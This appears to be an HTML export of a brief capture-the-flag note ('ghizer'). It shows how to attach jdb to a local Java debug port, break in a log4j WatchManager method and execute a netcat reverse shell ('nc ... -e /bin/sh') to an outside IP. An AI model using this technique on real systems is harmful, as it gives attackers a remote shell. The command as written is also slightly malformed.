<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>ghizer</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>ghizer</h1>

      <div class="ck-content">
        <p>The Java Debugger, jdb, is <strong>a simple command-line debugger for Java classes</strong>.
          It is a demonstration of the Java Platform Debugger Architecture that provides
          inspection and debugging of a local or remote Java Virtual Machine.</p>
        <p>Since we know port 18001 is running on localhost let type the command <i><strong>jdb -attach 127.0.0.1:18001 </strong></i>now
          type <i><strong>classpath </strong></i>after that type <i><strong>classes</strong></i>

        </p>
        <p><code><i><strong>stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()</strong></i></code>

        </p>
        <p><code><i><strong>print new java.lang.Runtime().exec(“nc 10.17.17.11 1337-e /bin/sh”)</strong></i></code>

        </p>
        <p><a href="https://www.youtube.com/watch?v=N3VcWIUpgfE"><i><strong>https://www.youtube.com/watch?v=N3VcWIUpgfE</strong></i></a><i><strong> </strong></i>

        </p>
      </div>
    </div>
  </body>

</html>